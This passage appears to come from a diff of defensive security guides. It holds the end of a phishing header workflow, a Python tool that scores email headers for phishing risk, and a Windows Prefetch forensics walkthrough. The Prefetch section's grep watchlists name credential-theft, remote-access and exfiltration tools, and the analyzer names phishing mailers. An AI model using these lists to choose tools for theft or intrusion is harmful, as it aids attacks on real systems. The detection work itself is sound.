   - Calculate time delta between hops
3. Flag any:
   - Unexpected relay servers
   - Geographic anomalies (IP in unexpected country)
   - Excessive delays (possible queuing for mass send)
   - Internal-only hostnames appearing in external mail

### Phase 4: Sender Investigation
1. WHOIS lookup on sending domain
   - Domain age < 30 days = high risk
   - Registrar known for abuse = medium risk
2. Reverse DNS on originating IP
3. AbuseIPDB / VirusTotal lookup on originating IP
4. Check if sending domain appears in known phishing feeds

### Phase 5: Indicator Extraction
1. Extract all URLs from message body and headers
2. Extract all IP addresses from Received chain
3. Extract domain names from all relevant fields
4. Create IOC list for threat intelligence platform

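A minimal sketch of Phase 5 follows, assuming simple regular expressions are good enough for a first pass. The names `extract_iocs` and `defang` are hypothetical, and the patterns are intentionally loose: they cover IPv4 and `http(s)` URLs only and will miss IPv6 addresses or obfuscated links. Indicators are defanged (`hxxp`, `[.]`) so that the resulting list cannot be clicked by accident.

```python
import re

URL_RE = re.compile(r"https?://[^\s<>\"')\]]+")
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def defang(value: str) -> str:
    """Rewrite http -> hxxp and bracket the dots in the host part only."""
    scheme, sep, rest = value.partition("://")
    if not sep:                                   # bare IP address or domain
        return value.replace(".", "[.]")
    host, slash, path = rest.partition("/")
    return scheme.replace("http", "hxxp") + sep + host.replace(".", "[.]") + slash + path


def extract_iocs(text: str) -> dict:
    """Collect unique URLs and IPv4 addresses from raw message text, defanged."""
    urls = sorted(set(URL_RE.findall(text)))
    ips = sorted(set(IPV4_RE.findall(text)))
    return {"urls": [defang(u) for u in urls], "ips": [defang(i) for i in ips]}


# Hypothetical input mixing a Received fragment and a body link.
sample = "Received: from mail.bad.example ([203.0.113.7]) see http://bad.example/login now"
print(extract_iocs(sample))
```

Keeping the original, non-defanged values in a separate field is usually necessary as well, since most threat intelligence platforms expect the raw indicator on import.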
## Workflow 3: Automated Pipeline

```
Email received --> MTA logs header -->
SIEM ingestion -->
Automated header parsing -->
Authentication check -->
IF fail: Create alert + enrich with TI -->
SOC analyst review -->
Confirm/dismiss -->
IF confirmed: Block + hunt similar
```

## Decision Matrix

| Authentication | Route | Sender Rep | Action |
|---|---|---|---|
| All Pass | Normal | Good | Deliver normally |
| SPF Fail | Normal | Good | Quarantine, investigate |
| DKIM Fail | Normal | Unknown | Quarantine, investigate |
| DMARC Fail | Anomalous | Bad | Block, create IOC |
| All Fail | Anomalous | Bad | Block, escalate, hunt |
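If the matrix is to drive an automated pipeline, one possible encoding is a plain lookup table. The key spellings and the `decide` helper are assumptions made for this sketch, and so is the fallback: the matrix does not say what to do with combinations it does not list, so the example quarantines them for manual review.

```python
# Rows of the decision matrix, keyed by (authentication, route, sender reputation).
DECISION_MATRIX = {
    ("all_pass", "normal", "good"): "Deliver normally",
    ("spf_fail", "normal", "good"): "Quarantine, investigate",
    ("dkim_fail", "normal", "unknown"): "Quarantine, investigate",
    ("dmarc_fail", "anomalous", "bad"): "Block, create IOC",
    ("all_fail", "anomalous", "bad"): "Block, escalate, hunt",
}


def decide(auth: str, route: str, reputation: str,
           default: str = "Quarantine, investigate") -> str:
    """Look up the action for a combination; unlisted combinations get the default (assumption)."""
    return DECISION_MATRIX.get((auth, route, reputation), default)


print(decide("all_fail", "anomalous", "bad"))
print(decide("spf_fail", "anomalous", "unknown"))   # not in the matrix, falls back
```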
@@ -0,0 +1,566 @@
#!/usr/bin/env python3
"""
Phishing Email Header Analyzer

Parses raw email headers to extract authentication results, routing information,
and phishing indicators. Optionally enriches hops with IP geolocation, reverse
DNS, and AbuseIPDB reputation, and generates a risk assessment report.

Usage:
    python process.py --file email_headers.txt
    python process.py --eml suspicious_email.eml
    python process.py --stdin < headers.txt
"""

import argparse
import email
import re
import json
import sys
import socket
import hashlib
from datetime import datetime, timezone
from email import policy
from email.parser import HeaderParser, BytesParser
from pathlib import Path
from typing import Optional
from dataclasses import dataclass, field, asdict

# requests is optional: without it, the enrichment lookups return empty results.
try:
    import requests
    HAS_REQUESTS = True
except ImportError:
    HAS_REQUESTS = False


@dataclass
class ReceivedHop:
    """Represents a single hop in the email routing chain."""
    server_from: str = ""
    server_by: str = ""
    ip_address: str = ""
    timestamp: str = ""
    protocol: str = ""
    hop_number: int = 0
    geo_location: str = ""
    reverse_dns: str = ""


@dataclass
class AuthenticationResult:
    """Email authentication check results."""
    spf: str = "none"
    spf_domain: str = ""
    dkim: str = "none"
    dkim_domain: str = ""
    dmarc: str = "none"
    dmarc_domain: str = ""
    compauth: str = ""


@dataclass
class PhishingIndicator:
    """A single phishing indicator found in headers."""
    category: str = ""
    description: str = ""
    severity: str = "low"  # low, medium, high, critical
    raw_value: str = ""


@dataclass
class HeaderAnalysis:
    """Complete header analysis results."""
    message_id: str = ""
    from_address: str = ""
    from_domain: str = ""
    return_path: str = ""
    return_path_domain: str = ""
    reply_to: str = ""
    reply_to_domain: str = ""
    subject: str = ""
    date: str = ""
    x_originating_ip: str = ""
    x_mailer: str = ""
    received_hops: list = field(default_factory=list)
    authentication: AuthenticationResult = field(default_factory=AuthenticationResult)
    indicators: list = field(default_factory=list)
    risk_score: int = 0
    risk_level: str = "unknown"
    urls_in_headers: list = field(default_factory=list)
    file_hash: str = ""


def extract_ip_from_received(received_value: str) -> str:
    """Extract the first public IPv4 address from a Received header value."""
    import ipaddress  # local import keeps this function self-contained

    # Ranges that never identify an external sender: RFC 1918 space and loopback.
    # A string-prefix test such as '172.2' would also discard public addresses
    # like 172.217.x.x, so membership is checked against real networks instead.
    internal_networks = [
        ipaddress.ip_network("10.0.0.0/8"),
        ipaddress.ip_network("172.16.0.0/12"),
        ipaddress.ip_network("192.168.0.0/16"),
        ipaddress.ip_network("127.0.0.0/8"),
    ]
    ip_patterns = [
        r'\[(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})\]',
        r'\((\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})\)',
        r'from\s+\S+\s+\(.*?(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})',
    ]
    for pattern in ip_patterns:
        match = re.search(pattern, received_value)
        if match:
            try:
                ip = ipaddress.ip_address(match.group(1))
            except ValueError:
                continue  # not a valid address, e.g. an octet above 255
            if not any(ip in network for network in internal_networks):
                return str(ip)
    return ""


def extract_domain(email_address: str) -> str:
    """Extract domain from an email address."""
    if not email_address:
        return ""
    match = re.search(r'@([\w.-]+)', email_address)
    return match.group(1).lower() if match else ""


def parse_received_header(received_value: str, hop_num: int) -> ReceivedHop:
    """Parse a single Received header into structured data."""
    hop = ReceivedHop(hop_number=hop_num)

    from_match = re.search(r'from\s+([\w.\-]+)', received_value, re.IGNORECASE)
    if from_match:
        hop.server_from = from_match.group(1)

    by_match = re.search(r'by\s+([\w.\-]+)', received_value, re.IGNORECASE)
    if by_match:
        hop.server_by = by_match.group(1)

    hop.ip_address = extract_ip_from_received(received_value)

    # The timestamp is whatever follows the semicolon at the end of the header.
    date_match = re.search(r';\s*(.+)$', received_value)
    if date_match:
        hop.timestamp = date_match.group(1).strip()

    proto_match = re.search(r'with\s+(ESMTP[SA]*|SMTP[SA]*|HTTP[S]?|LMTP)',
                            received_value, re.IGNORECASE)
    if proto_match:
        hop.protocol = proto_match.group(1).upper()

    return hop


def parse_authentication_results(auth_header: str) -> AuthenticationResult:
    """Parse Authentication-Results header."""
    result = AuthenticationResult()

    spf_match = re.search(r'spf=(pass|fail|softfail|neutral|none|temperror|permerror)',
                          auth_header, re.IGNORECASE)
    if spf_match:
        result.spf = spf_match.group(1).lower()

    spf_domain_match = re.search(r'smtp\.mailfrom=([\w.\-@]+)', auth_header, re.IGNORECASE)
    if spf_domain_match:
        result.spf_domain = spf_domain_match.group(1)

    dkim_match = re.search(r'dkim=(pass|fail|none|neutral|temperror|permerror)',
                           auth_header, re.IGNORECASE)
    if dkim_match:
        result.dkim = dkim_match.group(1).lower()

    dkim_domain_match = re.search(r'header\.[di]=([\w.\-]+)', auth_header, re.IGNORECASE)
    if dkim_domain_match:
        result.dkim_domain = dkim_domain_match.group(1)

    dmarc_match = re.search(r'dmarc=(pass|fail|none|bestguesspass|temperror|permerror)',
                            auth_header, re.IGNORECASE)
    if dmarc_match:
        result.dmarc = dmarc_match.group(1).lower()

    dmarc_domain_match = re.search(r'header\.from=([\w.\-]+)', auth_header, re.IGNORECASE)
    if dmarc_domain_match:
        result.dmarc_domain = dmarc_domain_match.group(1)

    compauth_match = re.search(r'compauth=(\w+)', auth_header, re.IGNORECASE)
    if compauth_match:
        result.compauth = compauth_match.group(1)

    return result


def geolocate_ip(ip_address: str) -> str:
    """Geolocate an IP address using ip-api.com (free, no key required)."""
    if not HAS_REQUESTS or not ip_address:
        return "unknown"
    try:
        resp = requests.get(f"http://ip-api.com/json/{ip_address}",
                            timeout=5,
                            params={"fields": "country,city,org,status"})
        if resp.status_code == 200:
            data = resp.json()
            if data.get("status") == "success":
                return f"{data.get('city', '')}, {data.get('country', '')} ({data.get('org', '')})"
    except Exception:
        pass
    return "unknown"


def reverse_dns_lookup(ip_address: str) -> str:
    """Perform reverse DNS lookup on an IP address."""
    if not ip_address:
        return ""
    try:
        hostname = socket.gethostbyaddr(ip_address)
        return hostname[0]
    except (socket.herror, socket.gaierror, OSError):
        return ""


def check_abuseipdb(ip_address: str, api_key: str = "") -> dict:
    """Check IP against AbuseIPDB (requires API key)."""
    if not HAS_REQUESTS or not api_key or not ip_address:
        return {}
    try:
        headers = {"Key": api_key, "Accept": "application/json"}
        params = {"ipAddress": ip_address, "maxAgeInDays": "90"}
        resp = requests.get("https://api.abuseipdb.com/api/v2/check",
                            headers=headers, params=params, timeout=10)
        if resp.status_code == 200:
            return resp.json().get("data", {})
    except Exception:
        pass
    return {}


def analyze_indicators(analysis: HeaderAnalysis) -> list:
    """Detect phishing indicators from parsed header data."""
    indicators = []

    # Check From vs Return-Path mismatch
    if (analysis.from_domain and analysis.return_path_domain and
            analysis.from_domain != analysis.return_path_domain):
        indicators.append(PhishingIndicator(
            category="sender_mismatch",
            description=f"From domain ({analysis.from_domain}) differs from "
                        f"Return-Path domain ({analysis.return_path_domain})",
            severity="high",
            raw_value=f"From: {analysis.from_domain}, Return-Path: {analysis.return_path_domain}"
        ))

    # Check From vs Reply-To mismatch
    if (analysis.from_domain and analysis.reply_to_domain and
            analysis.from_domain != analysis.reply_to_domain):
        indicators.append(PhishingIndicator(
            category="reply_to_mismatch",
            description=f"From domain ({analysis.from_domain}) differs from "
                        f"Reply-To domain ({analysis.reply_to_domain})",
            severity="high",
            raw_value=f"From: {analysis.from_domain}, Reply-To: {analysis.reply_to_domain}"
        ))

    # Check SPF failure
    if analysis.authentication.spf in ("fail", "softfail"):
        indicators.append(PhishingIndicator(
            category="authentication_failure",
            description=f"SPF check returned {analysis.authentication.spf}",
            severity="high" if analysis.authentication.spf == "fail" else "medium",
            raw_value=f"spf={analysis.authentication.spf}"
        ))

    # Check DKIM failure
    if analysis.authentication.dkim == "fail":
        indicators.append(PhishingIndicator(
            category="authentication_failure",
            description="DKIM signature verification failed",
            severity="high",
            raw_value="dkim=fail"
        ))

    # Check DMARC failure
    if analysis.authentication.dmarc == "fail":
        indicators.append(PhishingIndicator(
            category="authentication_failure",
            description="DMARC policy check failed",
            severity="critical",
            raw_value="dmarc=fail"
        ))

    # Check for missing Message-ID
    if not analysis.message_id:
        indicators.append(PhishingIndicator(
            category="missing_header",
            description="Message-ID header is missing",
            severity="medium",
            raw_value=""
        ))

    # Check for suspicious X-Mailer
    suspicious_mailers = [
        "PHPMailer", "King Phisher", "GoPhish", "Swaks",
        "Sendinblue", "Mass Mailer", "Bulk Mailer"
    ]
    if analysis.x_mailer:
        for mailer in suspicious_mailers:
            if mailer.lower() in analysis.x_mailer.lower():
                indicators.append(PhishingIndicator(
                    category="suspicious_mailer",
                    description=f"Suspicious X-Mailer detected: {analysis.x_mailer}",
                    severity="high",
                    raw_value=analysis.x_mailer
                ))
                break

    # Check for too few received hops (direct injection)
    if len(analysis.received_hops) <= 1:
        indicators.append(PhishingIndicator(
            category="routing_anomaly",
            description="Very few Received hops - possible direct SMTP injection",
            severity="medium",
            raw_value=f"Hop count: {len(analysis.received_hops)}"
        ))

    # Check for missing authentication results
    auth = analysis.authentication
    if auth.spf == "none" and auth.dkim == "none" and auth.dmarc == "none":
        indicators.append(PhishingIndicator(
            category="no_authentication",
            description="No email authentication results found (SPF, DKIM, DMARC all absent)",
            severity="high",
            raw_value=""
        ))

    return indicators


def calculate_risk_score(indicators: list) -> tuple:
    """Calculate risk score from indicators. Returns (score, level)."""
    severity_weights = {"critical": 30, "high": 20, "medium": 10, "low": 5}
    score = 0
    for indicator in indicators:
        score += severity_weights.get(indicator.severity, 0)

    score = min(score, 100)

    if score >= 70:
        level = "CRITICAL"
    elif score >= 50:
        level = "HIGH"
    elif score >= 30:
        level = "MEDIUM"
    elif score >= 10:
        level = "LOW"
    else:
        level = "CLEAN"

    return score, level


def analyze_headers(raw_headers: str, enrich: bool = False,
                    abuseipdb_key: str = "") -> HeaderAnalysis:
    """
    Main analysis function. Parses raw email headers and produces
    a complete HeaderAnalysis report.
    """
    analysis = HeaderAnalysis()

    # Calculate hash of raw input for evidence tracking
    analysis.file_hash = hashlib.sha256(raw_headers.encode()).hexdigest()

    # Parse using Python's email library
    parser = HeaderParser()
    msg = parser.parsestr(raw_headers)

    # Extract basic fields
    analysis.from_address = msg.get("From", "")
    analysis.from_domain = extract_domain(analysis.from_address)
    analysis.return_path = msg.get("Return-Path", "")
    analysis.return_path_domain = extract_domain(analysis.return_path)
    analysis.reply_to = msg.get("Reply-To", "")
    analysis.reply_to_domain = extract_domain(analysis.reply_to)
    analysis.message_id = msg.get("Message-ID", "")
    analysis.subject = msg.get("Subject", "")
    analysis.date = msg.get("Date", "")
    analysis.x_mailer = msg.get("X-Mailer", "") or msg.get("User-Agent", "")

    # Extract X-Originating-IP
    x_orig = msg.get("X-Originating-IP", "")
    if x_orig:
        ip_match = re.search(r'(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})', x_orig)
        if ip_match:
            analysis.x_originating_ip = ip_match.group(1)

    # Parse Received headers (they appear in reverse order)
    received_headers = msg.get_all("Received", [])
    for i, received in enumerate(received_headers):
        hop = parse_received_header(received, len(received_headers) - i)
        if enrich and hop.ip_address:
            hop.geo_location = geolocate_ip(hop.ip_address)
            hop.reverse_dns = reverse_dns_lookup(hop.ip_address)
        analysis.received_hops.append(hop)

    # Reverse to chronological order (first hop first)
    analysis.received_hops.reverse()

    # Parse Authentication-Results
    auth_results = msg.get("Authentication-Results", "")
    if auth_results:
        analysis.authentication = parse_authentication_results(auth_results)

    # Also check ARC-Authentication-Results
    arc_auth = msg.get("ARC-Authentication-Results", "")
    if arc_auth and analysis.authentication.spf == "none":
        analysis.authentication = parse_authentication_results(arc_auth)

    # Extract URLs from headers
    url_pattern = r'https?://[^\s<>"\')\]>]+'
    all_header_text = raw_headers
    analysis.urls_in_headers = list(set(re.findall(url_pattern, all_header_text)))

    # Detect phishing indicators
    analysis.indicators = analyze_indicators(analysis)

    # Calculate risk score
    analysis.risk_score, analysis.risk_level = calculate_risk_score(analysis.indicators)

    # Enrich with threat intelligence if requested
    if enrich and analysis.x_originating_ip and abuseipdb_key:
        abuse_data = check_abuseipdb(analysis.x_originating_ip, abuseipdb_key)
        if abuse_data and abuse_data.get("abuseConfidenceScore", 0) > 50:
            analysis.indicators.append(PhishingIndicator(
                category="threat_intelligence",
                description=f"IP {analysis.x_originating_ip} has abuse confidence "
                            f"score of {abuse_data['abuseConfidenceScore']}%",
                severity="critical",
                raw_value=json.dumps(abuse_data)
            ))
            # Recalculate risk
            analysis.risk_score, analysis.risk_level = calculate_risk_score(analysis.indicators)

    return analysis


def format_report(analysis: HeaderAnalysis) -> str:
    """Format analysis results as a human-readable report."""
    lines = []
    lines.append("=" * 70)
    lines.append(" PHISHING EMAIL HEADER ANALYSIS REPORT")
    lines.append("=" * 70)
    lines.append(f" Generated: {datetime.now(timezone.utc).isoformat()}")
    lines.append(f" Evidence Hash: {analysis.file_hash[:16]}...")
    lines.append("")

    # Risk Assessment
    lines.append(f" RISK LEVEL: {analysis.risk_level} (Score: {analysis.risk_score}/100)")
    lines.append("-" * 70)

    # Sender Information
    lines.append("\n[SENDER INFORMATION]")
    lines.append(f" From: {analysis.from_address}")
    lines.append(f" Return-Path: {analysis.return_path}")
    lines.append(f" Reply-To: {analysis.reply_to}")
    lines.append(f" Subject: {analysis.subject}")
    lines.append(f" Date: {analysis.date}")
    lines.append(f" Message-ID: {analysis.message_id}")
    lines.append(f" X-Mailer: {analysis.x_mailer}")
    if analysis.x_originating_ip:
        lines.append(f" Origin IP: {analysis.x_originating_ip}")

    # Authentication Results
    lines.append("\n[AUTHENTICATION RESULTS]")
    auth = analysis.authentication
    spf_icon = "PASS" if auth.spf == "pass" else "FAIL" if auth.spf in ("fail", "softfail") else "NONE"
    dkim_icon = "PASS" if auth.dkim == "pass" else "FAIL" if auth.dkim == "fail" else "NONE"
    dmarc_icon = "PASS" if auth.dmarc == "pass" else "FAIL" if auth.dmarc == "fail" else "NONE"
    lines.append(f" SPF: {spf_icon} ({auth.spf}) domain={auth.spf_domain}")
    lines.append(f" DKIM: {dkim_icon} ({auth.dkim}) domain={auth.dkim_domain}")
    lines.append(f" DMARC: {dmarc_icon} ({auth.dmarc}) domain={auth.dmarc_domain}")

    # Routing Path
    lines.append(f"\n[ROUTING PATH] ({len(analysis.received_hops)} hops)")
    for hop in analysis.received_hops:
        lines.append(f" Hop {hop.hop_number}: {hop.server_from} -> {hop.server_by}")
        if hop.ip_address:
            lines.append(f" IP: {hop.ip_address}")
        if hop.geo_location and hop.geo_location != "unknown":
            lines.append(f" Location: {hop.geo_location}")
        if hop.protocol:
            lines.append(f" Protocol: {hop.protocol}")
        if hop.timestamp:
            lines.append(f" Time: {hop.timestamp}")

    # Phishing Indicators
    if analysis.indicators:
        lines.append(f"\n[PHISHING INDICATORS] ({len(analysis.indicators)} found)")
        for i, ind in enumerate(analysis.indicators, 1):
            lines.append(f" {i}. [{ind.severity.upper()}] {ind.description}")
            if ind.raw_value:
                lines.append(f" Value: {ind.raw_value}")
    else:
        lines.append("\n[PHISHING INDICATORS] None detected")

    # URLs in Headers
    if analysis.urls_in_headers:
        lines.append(f"\n[URLS IN HEADERS] ({len(analysis.urls_in_headers)} found)")
        for url in analysis.urls_in_headers[:10]:
            lines.append(f" - {url}")

    lines.append("\n" + "=" * 70)
    lines.append(" END OF REPORT")
    lines.append("=" * 70)

    return "\n".join(lines)


def main():
    parser = argparse.ArgumentParser(
        description="Analyze email headers for phishing indicators"
    )
    input_group = parser.add_mutually_exclusive_group(required=True)
    input_group.add_argument("--file", "-f", help="Path to file containing raw headers")
    input_group.add_argument("--eml", "-e", help="Path to .eml file")
    input_group.add_argument("--stdin", action="store_true", help="Read headers from stdin")

    parser.add_argument("--enrich", action="store_true",
                        help="Enrich with IP geolocation and reverse DNS")
    parser.add_argument("--abuseipdb-key", default="",
                        help="AbuseIPDB API key for threat intelligence")
    parser.add_argument("--json", action="store_true",
                        help="Output results as JSON")
    parser.add_argument("--output", "-o", help="Write report to file")

    args = parser.parse_args()

    # Read input
    if args.stdin:
        raw_headers = sys.stdin.read()
    elif args.eml:
        with open(args.eml, "rb") as f:
            msg = BytesParser(policy=policy.default).parse(f)
            raw_headers = str(msg)
    else:
        with open(args.file, "r", encoding="utf-8", errors="replace") as f:
            raw_headers = f.read()

    # Analyze
    analysis = analyze_headers(
        raw_headers,
        enrich=args.enrich,
        abuseipdb_key=args.abuseipdb_key
    )

    # Output
    if args.json:
        output = json.dumps(asdict(analysis), indent=2, default=str)
    else:
        output = format_report(analysis)

    if args.output:
        with open(args.output, "w", encoding="utf-8") as f:
            f.write(output)
        print(f"Report written to {args.output}")
    else:
        print(output)

    # Exit code based on risk
    if analysis.risk_level in ("CRITICAL", "HIGH"):
        sys.exit(2)
    elif analysis.risk_level == "MEDIUM":
        sys.exit(1)
    else:
        sys.exit(0)


if __name__ == "__main__":
    main()
@@ -0,0 +1,311 @@
---
name: analyzing-prefetch-files-for-execution-history
description: Parse Windows Prefetch files to determine program execution history including run counts, timestamps, and referenced files for forensic investigation.
domain: cybersecurity
subdomain: digital-forensics
tags: [forensics, prefetch, windows-artifacts, execution-history, timeline-analysis, evidence-collection]
version: "1.0"
author: mahipal
license: MIT
---

# Analyzing Prefetch Files for Execution History

## When to Use
- When determining which programs were executed on a Windows system and when
- During malware investigations to confirm execution of suspicious binaries
- For establishing a timeline of application usage during an incident
- When correlating program execution with other forensic artifacts
- To identify anti-forensic tools or unauthorized software that was run

## Prerequisites
- Access to Windows Prefetch directory (C:\Windows\Prefetch\) from forensic image
- PECmd (Eric Zimmerman), WinPrefetchView, or python-prefetch parser
- Understanding of Prefetch file format (versions 17, 23, 26, 30)
- Windows system with Prefetch enabled (default on client OS, disabled on servers)
- Knowledge of Prefetch naming conventions (APPNAME-HASH.pf)

## Workflow
|
||||
|
||||
### Step 1: Extract Prefetch Files from Forensic Image
|
||||
|
||||
```bash
|
||||
# Mount the forensic image
|
||||
mount -o ro,loop,offset=$((2048*512)) /cases/case-2024-001/images/evidence.dd /mnt/evidence
|
||||
|
||||
# Copy all prefetch files
|
||||
mkdir -p /cases/case-2024-001/prefetch/
|
||||
cp /mnt/evidence/Windows/Prefetch/*.pf /cases/case-2024-001/prefetch/
|
||||
|
||||
# Count and list prefetch files
|
||||
ls /cases/case-2024-001/prefetch/*.pf | wc -l
|
||||
ls -la /cases/case-2024-001/prefetch/ | head -30
|
||||
|
||||
# Hash all prefetch files for integrity
|
||||
sha256sum /cases/case-2024-001/prefetch/*.pf > /cases/case-2024-001/prefetch/pf_hashes.txt
|
||||
|
||||
# Note: Prefetch filename format is EXECUTABLE_NAME-XXXXXXXX.pf
|
||||
# The hash (XXXXXXXX) is based on the executable path
|
||||
# Same executable from different paths creates different prefetch files
|
||||
```
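
The naming note above can be checked programmatically. The following is a minimal sketch, assuming the `EXECUTABLE_NAME-XXXXXXXX.pf` convention described in the comments; the function names `split_pf_name` and `executables_with_multiple_paths` are hypothetical helpers, not part of any tool listed in this skill. It groups Prefetch filenames by executable and reports names that appear with more than one path hash, which may indicate the same binary name being run from different locations.

```python
import re
from collections import defaultdict

# EXECUTABLE_NAME-XXXXXXXX.pf, where XXXXXXXX is eight hex digits
PF_NAME = re.compile(r"^(?P<exe>.+)-(?P<hash>[0-9A-F]{8})\.pf$", re.IGNORECASE)


def split_pf_name(filename):
    """Return (executable, path_hash) or None if the name does not match."""
    match = PF_NAME.match(filename)
    if not match:
        return None
    return match.group("exe").upper(), match.group("hash").upper()


def executables_with_multiple_paths(filenames):
    """Map each executable to its sorted path hashes when more than one exists."""
    hashes = defaultdict(set)
    for name in filenames:
        parsed = split_pf_name(name)
        if parsed:
            exe, path_hash = parsed
            hashes[exe].add(path_hash)
    return {exe: sorted(h) for exe, h in hashes.items() if len(h) > 1}


if __name__ == "__main__":
    # Illustrative filenames only; the hash values are made up
    sample = [
        "CMD.EXE-0BD30981.pf",
        "CMD.EXE-4A81B364.pf",
        "NOTEPAD.EXE-D8414F97.pf",
    ]
    print(executables_with_multiple_paths(sample))
```

Multiple hashes for one name are a lead rather than a finding: some hosting processes legitimately produce several Prefetch files, so the parsed executable path should be reviewed before drawing conclusions.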
|
||||
|
||||
### Step 2: Parse Prefetch Files with PECmd
|
||||
|
||||
```bash
|
||||
# Using Eric Zimmerman's PECmd (Windows or via Mono/Wine on Linux)
|
||||
# Download from https://ericzimmerman.github.io/
|
||||
|
||||
# Parse a single prefetch file
|
||||
PECmd.exe -f "C:\cases\prefetch\POWERSHELL.EXE-A1B2C3D4.pf"
|
||||
|
||||
# Parse all prefetch files and output to CSV
# (no trailing backslash inside the quotes: \" would escape the closing quote)
PECmd.exe -d "C:\cases\prefetch" --csv "C:\cases\analysis" --csvf prefetch_results.csv

# Parse with JSON output
PECmd.exe -d "C:\cases\prefetch" --json "C:\cases\analysis" --jsonf prefetch_results.json
|
||||
|
||||
# Output includes for each file:
|
||||
# - Executable name and path
|
||||
# - Run count
|
||||
# - Last run time (up to 8 timestamps on Windows 8 and later)
|
||||
# - Files and directories referenced during execution
|
||||
# - Volume information (serial number, creation date)
|
||||
# - Prefetch file creation time
|
||||
```
|
||||
|
||||
### Step 3: Parse with Python for Linux-Based Analysis
|
||||
|
||||
```bash
# The parser below uses only the Python standard library.

python3 << 'PYEOF'
import json
import os
import struct
from datetime import datetime, timezone


def filetime_to_datetime(ft):
    """Convert Windows FILETIME (100 ns ticks since 1601-01-01) to a UTC string."""
    if ft == 0:
        return None
    timestamp = (ft - 116444736000000000) / 10000000
    try:
        return datetime.fromtimestamp(timestamp, tz=timezone.utc).strftime('%Y-%m-%d %H:%M:%S UTC')
    except (OSError, OverflowError, ValueError):
        return None


def parse_prefetch(filepath):
    """Parse the header of an uncompressed Windows Prefetch file."""
    with open(filepath, 'rb') as f:
        data = f.read()

    # Check for MAM compressed format (Windows 10)
    if data[:4] == b'MAM\x04':
        # Windows 10 prefetch files are compressed
        print("  [Compressed Win10 format - use PECmd for full parsing]")
        return None

    if len(data) < 212 or data[4:8] != b'SCCA':
        print("  Invalid prefetch signature")
        return None

    # Version 17 (XP), 23 (Vista/7), 26 (8.1), 30 (10)
    version = struct.unpack('<I', data[0:4])[0]
    file_size = struct.unpack('<I', data[8:12])[0]
    # The name is a null-terminated UTF-16 string; bytes after the terminator are padding
    exec_name = data[16:76].decode('utf-16-le', errors='replace').split('\x00', 1)[0]

    # The run count offset depends on the format version
    run_count_offset = {17: 144, 23: 152}.get(version, 208)
    run_count = struct.unpack('<I', data[run_count_offset:run_count_offset + 4])[0]

    result = {
        'version': version,
        'executable': exec_name,
        'file_size': file_size,
        'run_count': run_count,
    }

    # Extract last execution timestamps
    if version == 17:  # XP - 1 timestamp
        ts = struct.unpack('<Q', data[120:128])[0]
        result['last_run'] = filetime_to_datetime(ts)
    elif version == 23:  # Vista/7 - 1 timestamp
        ts = struct.unpack('<Q', data[128:136])[0]
        result['last_run'] = filetime_to_datetime(ts)
    elif version >= 26:  # Win8+ - up to 8 timestamps
        timestamps = []
        for i in range(8):
            ts = struct.unpack('<Q', data[128 + i * 8:136 + i * 8])[0]
            if ts > 0:
                timestamps.append(filetime_to_datetime(ts))
        result['last_run_times'] = timestamps

    return result


# Process all prefetch files
prefetch_dir = '/cases/case-2024-001/prefetch/'
analysis_dir = '/cases/case-2024-001/analysis/'
results = []

for filename in sorted(os.listdir(prefetch_dir)):
    if filename.lower().endswith('.pf'):
        filepath = os.path.join(prefetch_dir, filename)
        print(f"\n=== {filename} ===")
        result = parse_prefetch(filepath)
        if result:
            print(f"  Executable: {result['executable']}")
            print(f"  Run Count: {result['run_count']}")
            if 'last_run' in result:
                print(f"  Last Run: {result['last_run']}")
            elif 'last_run_times' in result:
                for i, ts in enumerate(result['last_run_times']):
                    print(f"  Run Time {i+1}: {ts}")
            results.append(result)

# Save results
os.makedirs(analysis_dir, exist_ok=True)
with open(os.path.join(analysis_dir, 'prefetch_analysis.json'), 'w') as f:
    json.dump(results, f, indent=2)
PYEOF
```
|
||||
|
||||
### Step 4: Identify Suspicious Execution Evidence
|
||||
|
||||
```bash
|
||||
# Search for known malicious tool names in prefetch
|
||||
ls /cases/case-2024-001/prefetch/ | grep -iE \
|
||||
'(MIMIKATZ|PSEXEC|WMIC|COBALT|BEACON|PWDUMP|PROCDUMP|LAZAGNE|RUBEUS|BLOODHOUND|SHARPHOUND|CERTUTIL|BITSADMIN)'
|
||||
|
||||
# Search for script interpreters (potential malicious execution)
|
||||
ls /cases/case-2024-001/prefetch/ | grep -iE \
|
||||
'(POWERSHELL|CMD\.EXE|WSCRIPT|CSCRIPT|MSHTA|REGSVR32|RUNDLL32|MSIEXEC)'
|
||||
|
||||
# Search for remote access tools
|
||||
ls /cases/case-2024-001/prefetch/ | grep -iE \
|
||||
'(TEAMVIEWER|ANYDESK|LOGMEIN|VNC|SPLASHTOP|SCREENCONNECT|AMMYY)'
|
||||
|
||||
# Search for data exfiltration tools
|
||||
ls /cases/case-2024-001/prefetch/ | grep -iE \
|
||||
'(RAR|7Z|ZIP|RCLONE|MEGA|DROPBOX|ONEDRIVE|GDRIVE|FTP|CURL|WGET)'
|
||||
|
||||
# Find recently created prefetch files (newest executables run)
|
||||
ls -lt /cases/case-2024-001/prefetch/ | head -20
|
||||
|
||||
# Cross-reference with Shimcache and Amcache for confirmation
|
||||
# Prefetch existence = program was executed at least once
|
||||
```
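
Substring patterns such as `RAR`, `ZIP`, or `FTP` also match unrelated names (for example, a hypothetical `LIBRARY.EXE`). As a complement to the `grep` searches above, here is a small sketch that matches on the exact executable stem instead. The `WATCHLIST` contents and the `classify` helper are illustrative assumptions, not a vetted indicator list.

```python
import os

# Illustrative watchlist keyed by category; extend it for the case at hand
WATCHLIST = {
    "credential_tools": {"MIMIKATZ", "PWDUMP", "PROCDUMP", "LAZAGNE", "RUBEUS"},
    "archivers": {"RAR", "WINRAR", "7Z", "ZIP"},
    "transfer_tools": {"RCLONE", "FTP", "CURL", "WGET"},
}


def classify(filename):
    """Return the watchlist category for a .pf filename, or None if no exact match."""
    if not filename.lower().endswith(".pf") or "-" not in filename:
        return None
    exe = filename.rsplit("-", 1)[0]          # e.g. "RAR.EXE"
    stem = os.path.splitext(exe)[0].upper()   # e.g. "RAR"
    for category, names in WATCHLIST.items():
        if stem in names:
            return category
    return None


if __name__ == "__main__":
    for name in ["RAR.EXE-1A2B3C4D.pf", "LIBRARY.EXE-1A2B3C4D.pf"]:
        print(name, "->", classify(name))
```

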